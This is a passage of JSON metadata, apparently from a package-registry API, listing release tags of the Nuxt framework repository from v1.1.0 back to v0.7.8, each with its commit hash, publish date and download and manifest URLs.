z/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":